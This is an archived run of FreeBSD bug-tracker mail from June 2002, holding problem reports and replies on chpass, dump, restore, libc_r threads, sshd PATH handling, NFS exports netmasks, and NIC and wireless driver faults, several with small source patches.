freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 3:10:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B5A137B407 for ; Thu, 27 Jun 2002 03:10:03 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RAA2JU093193 for ; Thu, 27 Jun 2002 03:10:02 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RAA2og093191; Thu, 27 Jun 2002 03:10:02 -0700 (PDT) Received: from visi.gothic.net.au (visi.gothic.net.au [202.182.69.51]) by hub.freebsd.org (Postfix) with ESMTP id B49D637B406 for ; Thu, 27 Jun 2002 03:03:37 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by visi.gothic.net.au (Postfix) with ESMTP id DAAF9A6A81 for ; Thu, 27 Jun 2002 20:03:35 +1000 (EST) Received: by visi.gothic.net.au (Postfix, from userid 0) id C6CBAA6A01; Thu, 27 Jun 2002 20:03:30 +1000 (EST) Message-Id: <20020627100330.C6CBAA6A01@visi.gothic.net.au> Date: Thu, 27 Jun 2002 20:03:30 +1000 (EST) From: Sean Winn Reply-To: Sean Winn To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39919: chpass no longer edits existing entries Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39919 >Category: bin >Synopsis: chpass no longer edits existing entries >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 03:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Sean Winn >Release: FreeBSD 4.6-STABLE i386 >Organization: >Environment: System: FreeBSD visi.gothic.net.au 4.6-STABLE FreeBSD 4.6-STABLE #0: Tue Jun 25 01:04:00 EST 2002 sean@visi.gothic.net.au:/usr/obj/usr/src/sys/VISI i386 >Description: chpass has the ability to replace entire password file entries as the super user, which is great for scripts - they grab the existing password file entry, change as needed, then hand off to chpass to do the ugly copy/update/pwd_mkdb work. This worked fine for 4.5, but fails under 4.6R In change 1.9.2.2 of usr.bin/chpass/pw_copy.c, internal consistency checks were added to the copy loop; this relies on old_pw being set correctly in chpass.c; however, chpass.c does not initialise old_pw in all circumstances - the 'a' case specifically ('a' is considered LOADENTRY, and LOADENTRY doen't need to load an old entry - we're replacing unconditionally). This doesn't stop pw_copy being called with an uninitialised old_pw though, and the consistency checks fail. >How-To-Repeat: 19:44 root@visi [~] grep mysql /etc/master.passwd mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin 19:44 root@visi [~] chpass -a 'mysql:*:88:88::0:0:MySQL Daemon:/var/db/mysql:/sbin/nologin' chpass: /etc/master.passwd: entry inconsistent chpass: /etc/master.passwd: unchanged >Fix: --- usr.bin/chpass/chpass.c.orig Thu Jun 27 19:58:35 2002 +++ usr.bin/chpass/chpass.c Thu Jun 27 20:00:05 2002 @@ -268,7 +268,7 @@ } else { #endif /* YP */ pfd = pw_lock(); - pw_copy(pfd, tfd, pw, &old_pw); + pw_copy(pfd, tfd, pw, (op == LOADENTRY)? NULL : &old_pw ); if (!pw_mkdb(username)) pw_error((char *)NULL, 0, 1); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 3:50:25 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8458437B405 for ; Thu, 27 Jun 2002 03:50:04 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RAo4JU097265 for ; Thu, 27 Jun 2002 03:50:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RAo46R097264; Thu, 27 Jun 2002 03:50:04 -0700 (PDT) Date: Thu, 27 Jun 2002 03:50:04 -0700 (PDT) Message-Id: <200206271050.g5RAo46R097264@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Dan Lukes Subject: Re: bin/39868: cleaning sbin/dump code from warnings Reply-To: Dan Lukes Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39868; it has been noted by GNATS. From: Dan Lukes To: freebsd-gnats-submit@FreeBSD.org Cc: Subject: Re: bin/39868: cleaning sbin/dump code from warnings Date: Thu, 27 Jun 2002 12:48:22 +0200 Well - as long as sizeof(int)==sizeof(long) the bugs has no real impact, so it may remain unfixed in stable safelly. But the sbin/dump/traverse.c: In function `bread': 629: warning: int format, pointer arg (arg 3) disk is (char *) is the only error with real impact as the error message ---------------- msg("More than %d block read errors from %d\n", BREADEMAX, disk); ---------------- may be confusing (because disk is (char *)) for user. It should be fixed in -stable too, IMHO ... Dan -- Dan Lukes tel: +420 2 21914205, fax: +420 2 21914206 root of FIONet, KolejNET, webmaster of www.freebsd.cz AKA: dan@obluda.cz, dan@freebsd.cz, dan@kolej.mff.cuni.cz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 6:10:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 16B3D37B400 for ; Thu, 27 Jun 2002 06:10:04 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RDA3JU038997 for ; Thu, 27 Jun 2002 06:10:03 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RDA3Rx038996; Thu, 27 Jun 2002 06:10:03 -0700 (PDT) Date: Thu, 27 Jun 2002 06:10:03 -0700 (PDT) Message-Id: <200206271310.g5RDA3Rx038996@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Michael Adler Subject: Re: bin/39849: /sbin/restore fails to overwrite files with schg flag set Reply-To: Michael Adler Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39849; it has been noted by GNATS. From: Michael Adler To: "Crist J. Clark" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39849: /sbin/restore fails to overwrite files with schg flag set Date: Thu, 27 Jun 2002 09:04:13 -0400 At 03:15 AM 6/27/2002, Crist J. Clark wrote: >On Tue, Jun 25, 2002 at 01:24:31PM -0400, Michael C. Adler wrote: >[snip] > > > Incremental restore fails to overwrite an older file that has a flag > > set making the file immutable. > >I really think this is a feature and not a bug. However, I can see >where one might want this. I think the right way would be to have a >command line switch which enables this [su]chg-flag clobbering, and >leave the default as-is. I agree it is debatable. It seems to me that restore is a special case. Its goal is to produce a target identical to the source. Given that the source changed, I thought the target should as well. It could easily be put on a switch or perhaps it should be turned on with the -r switch. >Note that there are other, tougher issues when doing restores on an >existing filesystem when names collide (e.g. does restore(8) >over-write an existing directory with a plain file from backup?). >Handling this issue by running a, > > # chflags -R 0 /filesystem/path > >Before a restore(8) is fairly trivial. Of course this might not do what you want. Does an incremental dump have all the flags for all files in the target during restore -r? If not, the target files may lose their flags. -Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 6:20: 6 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B40FE37B401; Thu, 27 Jun 2002 06:20:00 -0700 (PDT) Received: from freefall.freebsd.org (matusita@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RDK0JU040067; Thu, 27 Jun 2002 06:20:00 -0700 (PDT) (envelope-from matusita@freefall.freebsd.org) Received: (from matusita@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RDK0Y1040049; Thu, 27 Jun 2002 06:20:00 -0700 (PDT) Date: Thu, 27 Jun 2002 06:20:00 -0700 (PDT) From: Makoto Matsushita Message-Id: <200206271320.g5RDK0Y1040049@freefall.freebsd.org> To: ash@telstra.net, matusita@FreeBSD.org, freebsd-bugs@FreeBSD.org, matusita@FreeBSD.org Subject: Re: misc/39908: releaseName env variable not reference in install.c Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: releaseName env variable not reference in install.c State-Changed-From-To: open->feedback State-Changed-By: matusita State-Changed-When: Thu Jun 27 06:18:48 PDT 2002 State-Changed-Why: It seems that the originator misunderstands the behavior of this funciton. Waiting for the feedback. Responsible-Changed-From-To: freebsd-bugs->matusita Responsible-Changed-By: matusita Responsible-Changed-When: Thu Jun 27 06:18:48 PDT 2002 Responsible-Changed-Why: I'll take this one. http://www.freebsd.org/cgi/query-pr.cgi?pr=39908 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 6:20:40 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5952F37B407 for ; Thu, 27 Jun 2002 06:20:04 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RDK4JU040104 for ; Thu, 27 Jun 2002 06:20:04 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RDK4qk040103; Thu, 27 Jun 2002 06:20:04 -0700 (PDT) Received: from kazi.fit.vutbr.cz (kazi.fit.vutbr.cz [147.229.8.12]) by hub.freebsd.org (Postfix) with ESMTP id 3610037B407 for ; Thu, 27 Jun 2002 06:12:59 -0700 (PDT) Received: (from cejkar@localhost) by kazi.fit.vutbr.cz (8.11.6/8.11.6) id g5RDCvL98013; Thu, 27 Jun 2002 15:12:57 +0200 (CEST) Message-Id: <200206271312.g5RDCvL98013@kazi.fit.vutbr.cz> Date: Thu, 27 Jun 2002 15:12:57 +0200 (CEST) From: cejkar@fit.vutbr.cz Reply-To: cejkar@fit.vutbr.cz To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: bin/39922: [PATCH?] Threaded applications executed with closed std file descr. could not use redirections Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39922 >Category: bin >Synopsis: [PATCH?] Threaded applications executed with closed std file descr. could not use redirections >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 06:20:03 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Rudolf Cejka >Release: FreeBSD 4.6-STABLE i386 >Organization: FIT, Brno University of Technology, Czech Republic >Environment: Tested on 4.6-STABLE. >Description: When an threaded application (linked with libc_r) is executed with closed some of the standard file descriptors (for example some daemons, server processes...), initialization code of threads opens two internal file descriptors (_thread_kern_pipe[0, 1]) that are then blocked for use by the threaded application, so if one of _thread_kern_pipe[0, 1] gets value 0, 1, or 2, an application could not use particular redirections. Similar scenario can occur around fork()/close() combination of calls. I have found this problem because of use of popen() library call in an threaded application, where the situation is even worse, because the failure of stdin/stdout redirection is silently ignored (another bug???), so everything looked that works, but communication between child and parent process was silently broken. (I understand that it is possible to disable linking label_tape with libc_r in my particular situation and problem should be avoided, however I see that this problem can be easily triggered by any real threaded applications.) >How-To-Repeat: >Fix: Here are two patches, which maybe are not very perfect solution to this problem, but they enable to run afbackup-3.3.7 with media changer and threads enabled successfully on my system via cron. The patches redirect descriptors _thread_kern_pipe[0, 1] with too small value (< 3) to any bigger value. --- uthread_init.c.orig Wed Jun 26 22:04:12 2002 +++ uthread_init.c Thu Jun 27 13:37:45 2002 @@ -111,6 +111,7 @@ _thread_init(void) { int fd; + int dupfd; int flags; int i; size_t len; @@ -207,6 +208,18 @@ else if ((_thread_kern_sched_stack = malloc(SCHED_STACK_SIZE)) == NULL) PANIC("Failed to allocate stack for scheduler"); else { + if (_thread_kern_pipe[0] < 3 && + (dupfd = _thread_sys_fcntl(_thread_kern_pipe[0], + F_DUPFD, 3)) != -1) { + close(_thread_kern_pipe[0]); + _thread_kern_pipe[0] = dupfd; + } + if (_thread_kern_pipe[1] < 3 && + (dupfd = _thread_sys_fcntl(_thread_kern_pipe[1], + F_DUPFD, 3)) != -1) { + close(_thread_kern_pipe[1]); + _thread_kern_pipe[1] = dupfd; + } /* Zero the global kernel thread structure: */ memset(&_thread_kern_thread, 0, sizeof(struct pthread)); _thread_kern_thread.flags = PTHREAD_FLAGS_PRIVATE; --- uthread_fork.c.orig Wed Jun 26 22:04:09 2002 +++ uthread_fork.c Thu Jun 27 13:37:45 2002 @@ -43,6 +43,7 @@ pid_t _fork(void) { + int dupfd; int i, flags; pid_t ret; pthread_t pthread; @@ -109,6 +110,18 @@ /* Abort this application: */ PANIC("Cannot initialize priority ready queue."); } else { + if (_thread_kern_pipe[0] < 3 && + (dupfd = _thread_sys_fcntl(_thread_kern_pipe[0], + F_DUPFD, 3)) != -1) { + close(_thread_kern_pipe[0]); + _thread_kern_pipe[0] = dupfd; + } + if (_thread_kern_pipe[1] < 3 && + (dupfd = _thread_sys_fcntl(_thread_kern_pipe[1], + F_DUPFD, 3)) != -1) { + close(_thread_kern_pipe[1]); + _thread_kern_pipe[1] = dupfd; + } /* * Enter a loop to remove all threads other than * the running thread from the thread list: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 6:30:14 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EC3E537B406 for ; Thu, 27 Jun 2002 06:30:01 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RDU1JU041219 for ; Thu, 27 Jun 2002 06:30:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RDU1wm041218; Thu, 27 Jun 2002 06:30:01 -0700 (PDT) Received: from www.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 9FF0437B400 for ; Thu, 27 Jun 2002 06:23:28 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RDNSOT095779 for ; Thu, 27 Jun 2002 06:23:28 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.4/8.12.4/Submit) id g5RDNS2P095778; Thu, 27 Jun 2002 06:23:28 -0700 (PDT) Message-Id: <200206271323.g5RDNS2P095778@www.freebsd.org> Date: Thu, 27 Jun 2002 06:23:28 -0700 (PDT) From: Clemens Wittinger To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/39923: openssh-portable 3.4 - path defined in login.conf is ignored Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39923 >Category: misc >Synopsis: openssh-portable 3.4 - path defined in login.conf is ignored >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 06:30:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Clemens Wittinger >Release: 4.5-RELEASE >Organization: >Environment: FreeBSD host 4.5-RELEASE-p7 FreeBSD 4.5-RELEASE-p7 #6: Thu Jun 27 13:35:17 CEST 2002 root@host:/var/obj/usr/src/sys/FS-GENERIC i386 >Description: sshd does not set the path according to login.conf, in fact the path out of sshd's environment is used. >How-To-Repeat: login. compare path defined in login.conf with PATH >Fix: --- session.c Thu Jun 27 15:08:09 2002 +++ /usr/ports/security/openssh-portable/work/openssh-3.4p1/session.c Thu Jun 27 15:07:42 2002 @@ -1120,7 +1120,6 @@ copy_environment(environ, &env, &envsize); xfree(environ); environ = senv; - child_set_env(&env, &envsize, "PATH", getenv("PATH")); var= login_getcapstr(lc, "lang", NULL, NULL); if ( var ) child_set_env(&env, &envsize, "LANG", var); var= login_getcapstr(lc, "charset", NULL, NULL); >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 9: 5:11 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from bug.udcast.com (ANice-101-2-1-104.abo.wanadoo.fr [193.251.10.104]) by hub.freebsd.org (Postfix) with ESMTP id 5F34337B405 for ; Thu, 27 Jun 2002 09:05:06 -0700 (PDT) Received: from udcast.com (IDENT:eduros@localhost [127.0.0.1]) by bug.udcast.com (8.11.0/8.11.0) with ESMTP id g5RG4xB12626; Thu, 27 Jun 2002 18:04:59 +0200 Message-ID: <3D1B37AA.6060104@udcast.com> Date: Thu, 27 Jun 2002 18:04:58 +0200 From: Emmanuel Duros User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.9) Gecko/20020516 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-bugs@freebsd.org Subject: intel 815 based motherboard with a 82562EM chipset Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org We are using MSI motherboards (model MS 6351) which is an intel i815E based motherboard with an integrated Ethernet adapter (82562EM chipset). Our PCs are FreeBSD 4.4R based. It happens from time to time, temporarily or continuously, that the PC loses its connectivity to the LAN. This happens to several of our PCs and is not restricted to a single box. A tcpdump shows that the adaptor no longer receives any traffic from the hub and that other hosts can see traffic from it (such as ARP request or multicast packets). And of course I checked the cable to make sure it was ok. Is this a known bug, any workaround ? Do you think this might be related to the following report ? http://docs.freebsd.org/cgi/getmsg.cgi?fetch=1926838+0+archive/2001/freebsd-questions/20010513.freebsd-questions Thanks, Emmanuel -- Emmanuel Duros http://www.udcast.com 2455 Route des Dolines BP355 | Tel : +33 (0)4 93 00 16 60 06906 Sophia Antipolis France | Fax : +33 (0)4 93 00 16 61 ** Full IP over Broadcast Media ** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 9:40:18 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D2E0B37B406 for ; Thu, 27 Jun 2002 09:40:05 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RGe5JU075883 for ; Thu, 27 Jun 2002 09:40:05 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RGe51A075880; Thu, 27 Jun 2002 09:40:05 -0700 (PDT) Date: Thu, 27 Jun 2002 09:40:05 -0700 (PDT) Message-Id: <200206271640.g5RGe51A075880@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Jin Guojun[DSD]" Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Reply-To: "Jin Guojun[DSD]" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39896; it has been noted by GNATS. From: "Jin Guojun[DSD]" To: "Crist J. Clark" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/39896: netmask 0xffffff00 no longer works in /etc/exports Date: Thu, 27 Jun 2002 09:38:14 -0700 "Crist J. Clark" wrote: > > On Wed, Jun 26, 2002 at 01:56:15PM -0700, Jin Guojun wrote: > [snip] > > > Somehow, netmask format in /etc/exports is restricted to > > ###.###.###.### only. > > /data -maproot=bin: -network 131.104.48 -mask 255.255.255.0 > > > > eubie# kill -HUP `cat /var/run/mountd.pid` > > eubie# mount eubie:/data /mnt > > eubie# > > > > The following format does not work any more > > /data -maproot=bin: -network 131.104.48 -mask 0xffffff00 > > > > mountd does not complain, but silently denies to export this > > partition: > > > > eubie# kill -HUP `cat /var/run/mountd.pid` > > eubie# mount eubie:/data /mnt > > eubie:/data: Permission denied > > > > > > >How-To-Repeat: > > add similar line to /etc/exports, restart mountd, and > > mount this partition locally or remotely. > > > > /data -maproot=bin: -network 131.104.48 -mask 0xffffff00 > > >Fix: > > > > Is any reason to make such change? or Is this a bug? > > I can't reproduce this. > > # uname -r > 4.6-RELEASE > # grep ^/export /etc/exports > /export -alldirs -ro -network 192.168.64 -mask 255.255.255.0 > # kill -HUP `cat /var/run/mountd.pid` > # showmount -e | grep ^/export > /export 192.168.64.0 > > And on a different machine on that net, I can mount it fine. Are you sure that you understand or did things correctly? :-) (Assume that all lines you typed are not typo !!!) Your netmask is 255.255.255.0 not 0xffffff00. If not typo, plesse try 0xffffff00 , which is asked in "How-To-Repeat" section. > -- > Crist J. Clark | cjclark@alum.mit.edu > | cjclark@jhu.edu > http://people.freebsd.org/~cjc/ | cjc@freebsd.org -- ------------ Jin Guojun ----------- v --- j_guojun@lbl.gov --- Distributed Systems Department http://www.itg.lbl.gov/~jin M/S 50B-2239 Ph#:(510) 486-7531 Fax: 486-6363 Lawrence Berkeley National Laboratory, Berkeley, CA 94720 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 9:40:41 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0DE6C37B401 for ; Thu, 27 Jun 2002 09:40:02 -0700 (PDT) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RGe1JU075871 for ; Thu, 27 Jun 2002 09:40:01 -0700 (PDT) (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RGe19i075870; Thu, 27 Jun 2002 09:40:01 -0700 (PDT) Received: from polaris.we.lc.ehu.es (polaris.we.lc.ehu.es [158.227.6.43]) by hub.freebsd.org (Postfix) with ESMTP id 9647537B405 for ; Thu, 27 Jun 2002 09:30:17 -0700 (PDT) Received: from v-ger.we.lc.ehu.es (v-ger.we.lc.ehu.es [158.227.6.51]) by polaris.we.lc.ehu.es (8.11.6/8.11.6) with ESMTP id g5RGUFj01121 for ; Thu, 27 Jun 2002 18:30:15 +0200 (MET DST) Received: from v-ger.we.lc.ehu.es (localhost [127.0.0.1]) by v-ger.we.lc.ehu.es (8.12.3/8.12.3) with ESMTP id g5RGUGEL001714 for ; Thu, 27 Jun 2002 18:30:16 +0200 (CEST) (envelope-from jose@v-ger.we.lc.ehu.es) Received: (from jose@localhost) by v-ger.we.lc.ehu.es (8.12.3/8.12.3/Submit) id g5RGUG7c001713; Thu, 27 Jun 2002 18:30:16 +0200 (CEST) Message-Id: <200206271630.g5RGUG7c001713@v-ger.we.lc.ehu.es> Date: Thu, 27 Jun 2002 18:30:16 +0200 (CEST) From: "Jose M. Alcaide" Reply-To: "Jose M. Alcaide" To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Subject: kern/39928: wi0 timeouts and hangs the system while sending data (D-Link DWL-650) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39928 >Category: kern >Synopsis: wi0 timeouts and hangs the system while sending data (D-Link DWL-650) >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Jun 27 09:40:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Jose M. Alcaide >Release: FreeBSD 4.6-RELEASE i386 >Organization: Universidad del Pais Vasco - Dept. de Electricidad y Electronica >Environment: System: FreeBSD v-ger.we.lc.ehu.es 4.6-RELEASE FreeBSD 4.6-RELEASE #7: Sat Jun 15 00:03:21 CEST 2002 toor@v-ger.we.lc.ehu.es:/usr/obj/usr/src/sys/V-GER i386 >Description: I have timeout problems with the D-Link DWL-650 every time I try to transmit big files (> 500 KB, for example): the transmission gets hanged after 200-300 KB have been transferred (the exact point varies). It also sometimes happens when when doing a ping flood (ping -s 1400 -f). However, data reception works just fine, including promiscuous mode. The system is running 4.6-RELEASE. The card is operating in infrastructure mode, and it gets correctly associated to a base station. WEP-128 bit is enabled. These are the relevant kernel messages: >>> D-Link DWL-650 card inserted <<< pcic0: Event mask 0x2 pcic0: Event mask 0x2 pcic0: Event mask 0x2 pcic0: Event mask 0x2 pcic0: Event mask 0x6 pcic0: Autodetected 3.3V card pccard: card inserted, slot 0 pcic0: reset 1 int is 10 stat is 6d pcic0: reset 2 int is 70 stat is 4d pcic0: reset 3 int is 70 stat is 6d pcic: I/O win 0 flags 15 240-27f wi0: Forcing IRQ to 11 pcic: I/O win 0 flags 5 240-27f wi0 at port 0x240-0x27f irq 11 flags 0x10000 slot 0 on pccard0 pcic: I/O win 0 flags 15 240-27f wi0: Forcing IRQ to 11 wi0: 802.11 address: 00:05:5d:5c:24:00 wi0: using RF:PRISM2.5 MAC:ISL3873 wi0: Intersil Firmware: Primary 1.00.07, Station 1.03.05 wi0: wi_has_wep = 1 bpf: wi0 attached pcic0: Event mask 0x9 >>> File transmission is started; after ~200-300 KB... <<< wi0: watchdog timeout wi0: timeout in wi_cmd 0x0002; event status 0x8000 wi0: timeout in wi_cmd 0x0000; event status 0x8000 wi0: wi_cmd: busy bit won't clear. wi0: wi_cmd: busy bit won't clear. wi0: init failed wi0: wi_cmd: busy bit won't clear. wi0: wi_cmd: busy bit won't clear. wi0: wi_cmd: busy bit won't clear. >>> and so on... <<< The system enters an quasi-frozen state, until I remove the card: about 15-20 seconds later the card extraction is detected and the system resumes its normal operation. I tried to set hw.pcic.intr_path=1 to no avail. Other PCMCIA cards work just fine (the machine is a Dell Inspiron 3700). >How-To-Repeat: 1. Get and insert a D-Link DWL-650 card into your laptop ;-) 2. Wait for it to be associated to a base station. 3. Send a large file (using ftp or scp, for example) to another machine. >Fix: Unknown. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Jun 27 9:55:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 1684E37B408; Thu, 27 Jun 2002 09:55:18 -0700 (PDT) Received: from freefall.freebsd.org (dwmalone@localhost [127.0.0.1]) by freefall.freebsd.org (8.12.4/8.12.4) with ESMTP id g5RGtHJU077568; Thu, 27 Jun 2002 09:55:17 -0700 (PDT) (envelope-from dwmalone@freefall.freebsd.org) Received: (from dwmalone@localhost) by freefall.freebsd.org (8.12.4/8.12.4/Submit) id g5RGtHKK077564; Thu, 27 Jun 2002 09:55:17 -0700 (PDT) Date: Thu, 27 Jun 2002 09:55:17 -0700 (PDT) From: David Malone Message-Id: <200206271655.g5RGtHKK077564@freefall.freebsd.org> To: dwmalone@FreeBSD.org, freebsd-bugs@FreeBSD.org, sound@FreeBSD.org Subject: Re: kern/37831: Half of buffer gets filled with silence when recording Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: 